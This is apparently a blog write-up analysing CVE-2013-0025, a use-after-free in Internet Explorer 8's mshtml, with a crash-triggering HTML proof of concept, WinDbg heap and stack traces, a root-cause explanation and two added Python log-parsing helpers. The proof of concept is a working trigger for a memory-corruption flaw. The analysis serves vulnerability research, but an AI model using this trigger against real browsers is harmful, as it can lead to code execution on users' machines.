CVE-2013-0025

Microsoft IE 'SLayoutRun' Use-After-Free Vulnerability (CNNVD-201302-197)

Microsoft Internet Explorer is the web browser bundled by default with the Microsoft Windows operating system.
Microsoft Internet Explorer 8 contains a use-after-free vulnerability in SLayoutRun. A remote attacker can use a crafted website to trigger access to a deleted object and exploit the vulnerability to execute arbitrary code.


Test environment

Windows 7

IE 8.0.7600.16385


The PoC code is as follows

<!doctype html>
<html>
<head></head>
<body>
<p> </p>
<script>
Math.tan(2,3);
document.body.style.whiteSpace = "pre-line";
setTimeout("document.body.innerHTML = 'i'",100);
</script>
</body>
</html>
1:023> r
eax=1ca0afb0 ebx=0411e8d8 ecx=00000000 edx=10001000 esi=1ceaefd8 edi=1ceaefd8
eip=65477386 esp=0411e84c ebp=0411e84c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
mshtml!ElementWantsNotification+0x5:
65477386 f7461c00000008  test    dword ptr [esi+1Ch],8000000h ds:0023:1ceaeff4=????????
1:022> !heap -p -a esi
    address 07620fd8 found in
    _DPH_HEAP_ROOT @ 1a1000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    75e06e8:          7620000             2000
    6fcd90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    77895674 ntdll!RtlDebugFreeHeap+0x0000002f
    77857aca ntdll!RtlpFreeHeap+0x0000005d
    77822d68 ntdll!RtlFreeHeap+0x00000142
    771af1ac kernel32!HeapFree+0x00000014
    6a2a930e mshtml!operator delete[]+0x00000016
    6a318c8d mshtml!CParaElement::`vector deleting destructor'+0x0000001f
    6a2b7dd0 mshtml!CBase::SubRelease+0x00000022
    6a310fdf mshtml!CElement::PrivateExitTree+0x00000011
    6a1f5b42 mshtml!CMarkup::SpliceTreeInternal+0x00000083
    6a1f6ff9 mshtml!CDoc::CutCopyMove+0x000000ca
    6a1f6f39 mshtml!CDoc::Remove+0x00000018
    6a1f6f17 mshtml!RemoveWithBreakOnEmpty+0x0000003a
    6a1f7aef mshtml!InjectHtmlStream+0x00000191
    6a1f793e mshtml!HandleHTMLInjection+0x0000005c
    6a1f71fa mshtml!CElement::InjectInternal+0x00000307
    6a1f704a mshtml!CElement::InjectCompatBSTR+0x00000046
    6a1f988c mshtml!CElement::put_innerHTML+0x00000040
    6a3372d6 mshtml!GS_BSTR+0x000001ac
    6a32235c mshtml!CBase::ContextInvokeEx+0x000005dc
    6a32c75a mshtml!CElement::ContextInvokeEx+0x0000009d
    6a32c79a mshtml!CInput::VersionedInvokeEx+0x0000002d
    6a2d3104 mshtml!PlainInvokeEx+0x000000eb
    6c75a22a jscript!IDispatchExInvokeEx2+0x00000104
    6c75a175 jscript!IDispatchExInvokeEx+0x0000006a
    6c75a3f6 jscript!InvokeDispatchEx+0x00000098
    6c75a4a0 jscript!VAR::InvokeByName+0x00000139
    6c76d8c8 jscript!VAR::InvokeDispName+0x0000007d
    6c759c0e jscript!CScriptRuntime::Run+0x0000208d
    6c765c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
    6c765bfb jscript!ScrFncObj::Call+0x0000008d
    6c765e11 jscript!CSession::Execute+0x0000015f

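As an added triage helper (not part of the original writeup), the following parser reads the `!heap -p -a` answer shown above and extracts the facts the author reads off by hand: whether the block is a freed page-heap allocation, which class's destructor freed it, which DOM setter the script invoked, and whether the faulting read at esi+1Ch lands inside that freed block. The embedded sample is an abridged copy of the output above.

```python
import re

# Constructed sample: the `!heap -p -a esi` output from the writeup, with the
# 32-frame freeing stack cut down to the frames the triage below relies on.
SAMPLE = """\
    address 07620fd8 found in
    _DPH_HEAP_ROOT @ 1a1000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    75e06e8:          7620000             2000
    6fcd90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    6a2a930e mshtml!operator delete[]+0x00000016
    6a318c8d mshtml!CParaElement::`vector deleting destructor'+0x0000001f
    6a2b7dd0 mshtml!CBase::SubRelease+0x00000022
    6a310fdf mshtml!CElement::PrivateExitTree+0x00000011
    6a1f988c mshtml!CElement::put_innerHTML+0x00000040
"""

FRAME = re.compile(r"^\s*([0-9a-f]{8})\s+(\w+!.+?)\s*$")   # "retaddr module!symbol+off"

def parse_heap_p(text):
    """Parse one `!heap -p -a` answer into {address, freed, base, size, stack}."""
    block, want_range = None, False
    for line in text.splitlines():
        m = re.search(r"address ([0-9a-f]+) found in", line)
        if m:
            block = {"address": int(m.group(1), 16), "freed": False, "stack": []}
        elif block is None:
            continue
        elif "allocation (" in line:          # "in free-ed allocation (" or "in busy allocation ("
            block["freed"], want_range = "free-ed" in line, True
        elif want_range:                      # next line: "<hdr>: VirtAddr VirtSize" (hex)
            m = re.search(r"[0-9a-f]+:\s+([0-9a-f]+)\s+([0-9a-f]+)", line)
            block["base"], block["size"] = int(m.group(1), 16), int(m.group(2), 16)
            want_range = False
        elif (m := FRAME.match(line)):        # call stack of the free (or alloc) of that block
            block["stack"].append((int(m.group(1), 16), m.group(2)))
    return block

def summarize(block):
    """Destroyed class (first destructor frame) and the DOM setter the script invoked."""
    cls = setter = None
    for _, sym in block["stack"]:
        if cls is None and "destructor" in sym:
            cls = sym.split("!", 1)[1].split("::")[0]
        if setter is None and (m := re.search(r"::put_(\w+)", sym)):
            setter = m.group(1)
    return cls, setter

def fault_in_freed_block(block, fault_addr):
    # UAF signature: the faulting access lies inside a block page heap reports as freed
    return block["freed"] and block["base"] <= fault_addr < block["base"] + block["size"]
```

For the run above, `summarize` yields ("CParaElement", "innerHTML") and the read at address+0x1C falls inside the 0x2000-byte freed block, which is exactly the conclusion drawn from the backtrace.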
Reuse:

1:023> r
eax=1ca0afb0 ebx=0411e8d8 ecx=00000000 edx=10001000 esi=1ceaefd8 edi=1ceaefd8
eip=65477386 esp=0411e84c ebp=0411e84c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
mshtml!ElementWantsNotification+0x5:
65477386 f7461c00000008  test    dword ptr [esi+1Ch],8000000h ds:0023:1ceaeff4=????????

Allocation:

1:021> g
Breakpoint 2 hit
eax=077e6fd8 ebx=07cfefd0 ecx=7721349f edx=00000000 esi=077e6fd8 edi=07d59f70
eip=6830480f esp=0440f4a4 ebp=0440f4b0 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CElement::CElement:
6830480f 8bff            mov     edi,edi
1:021> dd eax
077e6fd8  00000000 00000000 00000000 00000000
077e6fe8  00000000 00000000 00000000 00000000
077e6ff8  00000000 00000000 ???????? ????????
077e7008  ???????? ???????? ???????? ????????
077e7018  ???????? ???????? ???????? ????????
077e7028  ???????? ???????? ???????? ????????
077e7038  ???????? ???????? ???????? ????????
077e7048  ???????? ???????? ???????? ????????
1:021> kv
ChildEBP RetAddr  Args to Child              
0440f4a0 68322dbf 0000004d 05832680 0440f4c4 mshtml!CElement::CElement
0440f4b0 68327e98 0000004d 05832680 07cfef08 mshtml!CBlockElement::CBlockElement+0x12
0440f4c4 68304be9 07d59f70 05832680 0440f500 mshtml!CParaElement::CreateElement+0x26
0440f4f0 68308961 0440f524 07a04f30 00000000 mshtml!CreateElement+0x43
0440f51c 68306e93 00000000 071fafb0 07d59f70 mshtml!CHtmParse::ParseBeginTag+0xe3
0440f538 683075c9 7710ef76 071fafb0 071fafb0 mshtml!CHtmParse::ParseToken+0x82
0440f5e0 682f78e8 071fafb0 0af194c6 0af194c6 mshtml!CHtmPost::ProcessTokens+0x237
0440f6a4 682f8a99 0af194c6 00000000 071fafb0 mshtml!CHtmPost::Exec+0x221
0440f6bc 682f89fd 0af194c6 00000000 071fafb0 mshtml!CHtmPost::Run+0x15
0440f6dc 682f7c66 057e4d58 0af194c6 071fafb0 mshtml!PostManExecute+0x1fb
0440f6f8 683113f6 00000001 00000007 0440f718 mshtml!PostManResume+0xf7
0440f708 682f53fc 07d06f98 071fafb0 0440f74c mshtml!CHtmPost::OnDwnChanCallback+0x10
0440f718 683994b2 07d06f98 00000000 057e4d58 mshtml!CDwnChan::OnMethodCall+0x19
0440f74c 683837f7 0440f7e8 00008002 00000000 mshtml!GlobalWndOnMethodCall+0xff
0440f76c 76c686ef 004c0314 00000008 00000000 mshtml!GlobalWndProc+0x10c
0440f798 76c68876 68371de3 004c0314 00008002 USER32!InternalCallWinProc+0x23
0440f810 76c689b5 00000000 68371de3 004c0314 USER32!UserCallWinProcCheckWow+0x14b (FPO: [Non-Fpo])
0440f870 76c68e9c 68371de3 00000000 0440f8f8 USER32!DispatchMessageWorker+0x35e (FPO: [Non-Fpo])
0440f880 6ea704a6 0440f898 00000000 017ecf58 USER32!DispatchMessageW+0xf (FPO: [Non-Fpo])
0440f8f8 6ea80446 04fba808 00000000 02f40ff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x452 (FPO: [Non-Fpo])

Free:

(68327ec0)   mshtml!CParaElement::`vftable'   |  (68328169)   mshtml!CStyleSelector::SetSelectorPart
Exact matches:
    mshtml!CParaElement::`vftable' = <no type information>
ChildEBP RetAddr  Args to Child              
0438eddc 68387db6 0791cf30 00000000 0438ef48 mshtml!CBase::SubRelease (FPO: [0,0,0])
0438edec 683e0fdf 07f2afd8 00000000 682c660e mshtml!CBase::PrivateRelease+0x3c
0438edf8 682c660e 0791cf30 00000000 00000018 mshtml!CElement::PrivateExitTree+0x11 (FPO: [0,0,1])
0438ef48 682c5b42 0438f06c 0438efbc 00000000 mshtml!CSpliceTreeEngine::RemoveSplice+0x841
0438f028 682c6ff9 0438f060 0438f06c 00000000 mshtml!CMarkup::SpliceTreeInternal+0x83
0438f078 682c6f39 0438f220 0438f25c 00000001 mshtml!CDoc::CutCopyMove+0xca
0438f094 682c6f17 0438f220 0438f25c 00000000 mshtml!CDoc::Remove+0x18
0438f0ac 682c7aef 0438f25c 07b70e74 683791b8 mshtml!RemoveWithBreakOnEmpty+0x3a
0438f1a8 682c793e 0438f220 0438f25c 0438f1d0 mshtml!InjectHtmlStream+0x191
0438f1e4 682c71fa 0438f220 0438f25c 00000002 mshtml!HandleHTMLInjection+0x5c
0438f29c 682c704a 00000000 00000001 07b70e74 mshtml!CElement::InjectInternal+0x307
0438f2b8 682c988c 05680fd0 00000000 00000001 mshtml!CElement::InjectCompatBSTR+0x46
0438f2d8 684072d6 00680fd0 07b70e74 07b7ffd0 mshtml!CElement::put_innerHTML+0x40
0438f308 683f235c 05680fd0 07b7ffd0 07039fd8 mshtml!GS_BSTR+0x1ac
0438f37c 683fc75a 05680fd0 80010402 00000002 mshtml!CBase::ContextInvokeEx+0x5dc
0438f3cc 683fc79a 05680fd0 80010402 00000002 mshtml!CElement::ContextInvokeEx+0x9d
0438f3f8 683a3104 05680fd0 80010402 00000002 mshtml!CInput::VersionedInvokeEx+0x2d
0438f44c 6bcfa22a 06b12fd8 80010402 00000002 mshtml!PlainInvokeEx+0xeb
0438f488 6bcfa175 07328d10 80010402 00000409 jscript!IDispatchExInvokeEx2+0x104
0438f4c4 6bcfa3f6 07328d10 00000409 00000004 jscript!IDispatchExInvokeEx+0x6a
(96c.c6c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07912fb0 ebx=0438edb8 ecx=00000000 edx=10001000 esi=07f2afd8 edi=07f2afd8
eip=68387386 esp=0438ed2c ebp=0438ed2c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
mshtml!ElementWantsNotification+0x5:
68387386 f7461c00000008  test    dword ptr [esi+1Ch],8000000h ds:0023:07f2aff4=????????


Trying to map this onto the JS statements

Modified PoC

<!doctype html>
<html>
<head></head>
<body>
<p> </p>
<script>
Math.tan(2,3);
document.body.style.whiteSpace = "pre-line";
Math.sin(0);
setTimeout("document.body.innerHTML = 'i'",100);
Math.cos(0);
</script>
</body>
</html>

The CParaElement object involved in the UAF is the one created for the

<p> </p>

tag in the page.

1:020> g
Breakpoint 1 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
eip=6be7d8c0 esp=0423ecf4 ebp=0423ed30 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
jscript!tan:
6be7d8c0 ff258010e56b    jmp     dword ptr [jscript!_imp__tan (6be51080)] ds:0023:6be51080={msvcrt!tan (758dde34)}
1:020> g
Breakpoint 3 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
eip=6be7d711 esp=0423ecf4 ebp=0423ed30 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
jscript!sin:
6be7d711 ff256810e56b    jmp     dword ptr [jscript!_imp__sin (6be51068)] ds:0023:6be51068={msvcrt!sin (758d8aea)}
1:020> g
Breakpoint 2 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
eip=6be7d67f esp=0423ecf4 ebp=0423ed30 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
jscript!cos:
6be7d67f ff259010e56b    jmp     dword ptr [jscript!_imp__cos (6be51090)] ds:0023:6be51090={msvcrt!cos (758d8ace)}
1:020> g
eax=06cd5b88 ebx=00000000 ecx=0792afd8 edx=686f5100 esi=07020fd0 edi=00000384
eip=68387d27 esp=0423df4c ebp=0423df60 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CBase::SubRelease:
68387d27 834108f8        add     dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=00000010
1:020> g
eax=06cd5b88 ebx=00000000 ecx=0792afd8 edx=686f5100 esi=07020fd0 edi=00000384
eip=68387d27 esp=0423df4c ebp=0423df60 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CBase::SubRelease:
68387d27 834108f8        add     dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=00000010
1:020> g
eax=00000043 ebx=00000000 ecx=0792afd8 edx=00000000 esi=0792afd8 edi=00000000
eip=68387d27 esp=0423e8f8 ebp=0423e904 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CBase::SubRelease:
68387d27 834108f8        add     dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=0000000a
1:020> g
(6b0.f20): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=079d2fb0 ebx=0423e8d0 ecx=00000000 edx=10001000 esi=0792afd8 edi=0792afd8
eip=68387386 esp=0423e844 ebp=0423e844 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
mshtml!ElementWantsNotification+0x5:
68387386 f7461c00000008  test    dword ptr [esi+1Ch],8000000h ds:0023:0792aff4=????????

From CElement::put_innerHTML in the backtrace, the free can be attributed to the PoC statement document.body.innerHTML = 'i'.

There is no obvious JS statement that corresponds to the reuse.
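Added example, not part of the original post: the marker technique above (Math.tan/sin/cos set as breakpoint landmarks) can be evaluated mechanically. This parser reads an abridged copy of the session log above, orders the debugger stops, reports which marker preceded each CBase::SubRelease, and checks that the object released in SubRelease (this pointer in ecx) is the one dereferenced through esi at the access violation.

```python
import re
# Constructed sample: an abridged copy of the marker-breakpoint session from the
# writeup (bp on jscript!tan/sin/cos and mshtml!CBase::SubRelease, then the AV).
LOG = """\
Breakpoint 1 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
jscript!tan:
Breakpoint 3 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
jscript!sin:
Breakpoint 2 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
jscript!cos:
eax=06cd5b88 ebx=00000000 ecx=0792afd8 edx=686f5100 esi=07020fd0 edi=00000384
mshtml!CBase::SubRelease:
eax=06cd5b88 ebx=00000000 ecx=0792afd8 edx=686f5100 esi=07020fd0 edi=00000384
mshtml!CBase::SubRelease:
eax=00000043 ebx=00000000 ecx=0792afd8 edx=00000000 esi=0792afd8 edi=00000000
mshtml!CBase::SubRelease:
(6b0.f20): Access violation - code c0000005 (first chance)
eax=079d2fb0 ebx=0423e8d0 ecx=00000000 edx=10001000 esi=0792afd8 edi=0792afd8
mshtml!ElementWantsNotification+0x5:
"""
REGS = re.compile(r"\b(e[a-d]x|e[sd]i)=([0-9a-f]{8})")
STOP = re.compile(r"^\w+!(.+?):$")          # "module!symbol:" line naming where the debugger stopped
MARKERS = {"tan", "sin", "cos"}             # the Math.* calls inserted into the PoC as JS-level landmarks
def timeline(log):
    """[(symbol, registers, hit_by_av)] in the order the debugger stopped."""
    events, regs, av = [], {}, False
    for line in log.splitlines():
        if "Access violation" in line:
            av = True
        elif REGS.search(line):             # register dump precedes the symbol line
            regs = {k: int(v, 16) for k, v in REGS.findall(line)}
        elif (m := STOP.match(line)):
            events.append((m.group(1), regs, av))
            regs, av = {}, False
    return events

def last_marker_before(events, idx):
    """Most recent inserted Math.* call executed before events[idx] (None: before any marker)."""
    for sym, _, _ in reversed(events[:idx]):
        if sym in MARKERS:
            return sym
    return None
def released_then_faulted(events):
    """Objects whose refcount dropped in SubRelease (this in ecx) and later read via esi at the AV."""
    released = {regs["ecx"] for sym, regs, _ in events if sym == "CBase::SubRelease"}
    return [regs["esi"] for _, regs, av in events if av and regs["esi"] in released]
```

Every SubRelease lands after the last marker (cos), so the release happens outside the inline script, in the setTimeout callback, and the released object 0792afd8 is the esi that faults.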


Root cause analysis

The root cause of this vulnerability is that a CTreeNode is not freed and still holds a dangling pointer to the CParaElement object; the CTreeNode is not freed because it is wrongly referenced by a CTreeDataPos object.


posted @ 2016-08-19 23:01  Ox9A82